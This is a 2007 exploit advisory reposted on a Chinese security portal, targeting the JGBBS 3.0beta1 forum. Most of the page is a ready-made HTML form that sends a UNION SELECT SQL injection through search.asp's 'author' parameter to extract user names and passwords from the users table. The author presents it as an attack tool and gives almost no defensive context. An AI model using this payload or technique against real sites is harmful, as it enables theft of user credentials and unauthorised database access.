首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit
来源:http://www.UniquE-Key.Org 作者:UniquE 发布时间:2007-03-14  
<!--

JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-13}

Product / Vendor :

JGBBS Is a Tree-style Online Forum System

http://sourceforge.net/projects/jgbbs/

Bug :

http://localhost/script/search.asp?author=-SQL Inj.-&bid=0

SQL Injection Exploit :

-->

<title>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</title>
<body bgcolor="#000000">
<form name="searchFrm" method="get" action="http://localhost/script/search.asp">
<table width="500" border="0" align="center">
<font face="Verdana" size="2" color="#FF0000"><b>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</b></font>
<br>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</td>
    <td>&nbsp;</td>
    <td><input name="author" type="text" value="UniquE-Key'UNION SELECT 0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 FROM users" class="inputbox" style="color: #000000" style="width:300px; "></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
    <td>&nbsp;</td>
    <td>
      <select name="bid">
        <option value="0">(ALL)</option>
      </select>&nbsp;
      <input type="submit" value="Apply">
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

<!--
Tested :

JGBBS 3.0beta1

Vulnerable :

JGBBS 3.0beta1

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
-->

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dayfox Blog 4 (postpost.php) R
·PHP 5.2.0 ext/filter Space Tri
·WSN Guest 1.21 (comments.php i
·TFTP Server 1.3 Remote Buffer
·ZomPlog <= 3.7.6 Local File In
·News Bin Pro 4.32 Article Grab
·WarFTP 1.65 (USER) Remote Buff
·NewsReactor 20070220 Article G
·PHP <= 5.2.1 session_regenerat
·NewsReactor 20070220 Article G
·PHP 5.2.0/5.2.1 Rejected Sessi
·MS Windows DCE-RPC svcctl Chan
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved